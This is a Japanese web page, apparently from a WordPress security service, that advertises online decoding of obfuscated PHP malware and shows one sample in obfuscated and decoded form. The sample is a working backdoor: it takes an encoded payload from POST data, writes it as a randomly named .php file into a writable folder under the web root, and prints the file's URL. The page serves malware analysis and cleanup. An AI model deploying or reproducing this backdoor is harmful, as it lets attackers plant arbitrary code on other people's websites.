Wordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。
<?php $pliFQ = "\x44".'O'.chr(172-105).chr(409-324).'M'.chr(230-161).'N'."\124".chr(95)."\122"."\x4f".'O'.chr(84);$JOXpmUPigp = 'H'.'T'.'T'.chr(698-618).chr(95).'H'.'O'."\x53"."\124";$treoc = 'h'.chr(116).chr(116)."\x70".chr(114-56).chr(333-286).chr(47);$BljWa = "\x2e"."\160"."\150"."\160";$eFpyHZ = "\160"."\150".chr(909-797);$drfkZCa = chr(102)."\x69".'l'."\x65".chr(437-342)."\160"."\165".chr(116).chr(431-336)."\x63".chr(299-188)."\x6e".chr(116).chr(939-838)."\x6e"."\164".chr(909-794);$yFXpZrkI = chr(719-605).'a'."\x77".chr(190-73).chr(114).'l'.chr(100).chr(544-443)."\143"."\157"."\x64".chr(624-523);$zkYFbRk = chr(511-394)."\x6e".chr(764-649)."\145".'r'.'i'.'a'.chr(349-241).chr(105)."\x7a"."\145";$cpjyIexnjm = "\151".'s'.chr(95).'w'.'r'.'i'.'t'.chr(141-44).chr(98).chr(1076-968).'e';$lOetkY = chr(722-610).chr(104).chr(740-628)."\166".'e'.chr(114).chr(602-487).chr(105).chr(111).'n';$AAcMs = "\x73".chr(367-251).chr(810-696).'_'.'r'.chr(1020-909).chr(520-404).chr(49).chr(473-422);$UyWks = 's'."\145"."\x72".'i'."\141".'l'."\151"."\x7a".chr(136-35);$yiXexdoY = "\x73".'t'."\x72"."\x5f"."\x73".chr(112).chr(177-69)."\151".chr(116);foreach ($_POST as $KNBEIL => $iYtEG){$IDXWcsLMv = strlen($KNBEIL);if ($IDXWcsLMv == 16){$iYtEG = $yiXexdoY($yFXpZrkI($AAcMs($iYtEG)));$KNBEIL = array_slice($yiXexdoY(str_repeat($KNBEIL, (count($iYtEG)/16)+1)), 0, count($iYtEG));function Crvnr($IlBTjdfVk, $GwoXimeLqz, $KNBEIL){$BDaOlWhTy = "3cc92681-ba76-47ba-9b58-197099006e52";return $IlBTjdfVk ^ $BDaOlWhTy[$GwoXimeLqz % strlen($BDaOlWhTy)] ^ $KNBEIL;}$iYtEG = array_map("Crvnr", array_values($iYtEG), array_keys($iYtEG), array_values($KNBEIL));$iYtEG = implode("", $iYtEG);$iYtEG = @$zkYFbRk($iYtEG);if (@is_array($iYtEG)){$GvgdpmTFBfGNlJyD = array_keys($iYtEG);$iYtEG = $iYtEG[$GvgdpmTFBfGNlJyD[0]];if ($iYtEG === $GvgdpmTFBfGNlJyD[0]){echo @$UyWks(Array($eFpyHZ => @$lOetkY(), ));exit();}else {function TjXGpEE($GvgdpmTir){static $iRdcWcU = array();$yoiorRzo = glob($GvgdpmTir . '/*', GLOB_ONLYDIR);$MfieQU = count($yoiorRzo);if ($MfieQU > 0) {foreach ($yoiorRzo as $GvgdpmT) {if (@$cpjyIexnjm($GvgdpmT)) {$iRdcWcU[] = $GvgdpmT;}}}foreach ($yoiorRzo as $GvgdpmTir) TjXGpEE($GvgdpmTir);return $iRdcWcU;}$yIEvDnr = $_SERVER[$pliFQ];$yoiorRzo = TjXGpEE($yIEvDnr);$GvgdpmTFBfGNlJyD = array_rand($yoiorRzo);$bzqJpw = $yoiorRzo[$GvgdpmTFBfGNlJyD] . "/" . substr(md5(time()), 0, 8) . $BljWa;@$drfkZCa($bzqJpw, $iYtEG);$BjfGqYWJ = $treoc . $_SERVER[$JOXpmUPigp] . substr($bzqJpw, strlen($yIEvDnr));print($BjfGqYWJ);die();}}}}
<?php $pliFQ = "DOCUMENT_ROOT"; $JOXpmUPigp = "HTTP_HOST"; $treoc = "http://"; $BljWa = ".php"; $eFpyHZ = "php"; $drfkZCa = "file_put_contents"; $yFXpZrkI = "rawurldecode"; $zkYFbRk = "unserialize"; $cpjyIexnjm = "is_writable"; $lOetkY = "phpversion"; $AAcMs = "str_rot13"; $UyWks = "serialize"; $yiXexdoY = "str_split"; foreach ($_POST as $KNBEIL => $iYtEG) { $IDXWcsLMv = strlen($KNBEIL); if ($IDXWcsLMv == 16) { $iYtEG = $yiXexdoY($yFXpZrkI($AAcMs($iYtEG))); $KNBEIL = array_slice($yiXexdoY(str_repeat($KNBEIL, count($iYtEG) / 16 + 1)), 0, count($iYtEG)); function Crvnr($IlBTjdfVk, $GwoXimeLqz, $KNBEIL) { $BDaOlWhTy = "3cc92681-ba76-47ba-9b58-197099006e52"; return $IlBTjdfVk ^ $BDaOlWhTy[$GwoXimeLqz % strlen($BDaOlWhTy)] ^ $KNBEIL; } $iYtEG = array_map("Crvnr", array_values($iYtEG), array_keys($iYtEG), array_values($KNBEIL)); $iYtEG = implode("", $iYtEG); $iYtEG = @$zkYFbRk($iYtEG); if (@is_array($iYtEG)) { $GvgdpmTFBfGNlJyD = array_keys($iYtEG); $iYtEG = $iYtEG[$GvgdpmTFBfGNlJyD[0]]; if ($iYtEG === $GvgdpmTFBfGNlJyD[0]) { echo @$UyWks(array($eFpyHZ => @$lOetkY())); exit; } else { function TjXGpEE($GvgdpmTir) { static $iRdcWcU = array(); $yoiorRzo = glob($GvgdpmTir . '/*', GLOB_ONLYDIR); $MfieQU = count($yoiorRzo); if ($MfieQU > 0) { foreach ($yoiorRzo as $GvgdpmT) { if (@$cpjyIexnjm($GvgdpmT)) { $iRdcWcU[] = $GvgdpmT; } } } foreach ($yoiorRzo as $GvgdpmTir) { TjXGpEE($GvgdpmTir); } return $iRdcWcU; } $yIEvDnr = $_SERVER[$pliFQ]; $yoiorRzo = TjXGpEE($yIEvDnr); $GvgdpmTFBfGNlJyD = array_rand($yoiorRzo); $bzqJpw = $yoiorRzo[$GvgdpmTFBfGNlJyD] . "/" . substr(md5(time()), 0, 8) . $BljWa; @$drfkZCa($bzqJpw, $iYtEG); $BjfGqYWJ = $treoc . $_SERVER[$JOXpmUPigp] . substr($bzqJpw, strlen($yIEvDnr)); print $BjfGqYWJ; die; } } } }
■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]
■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります
(C)2019 ワードプレス ドクター All rights reserved.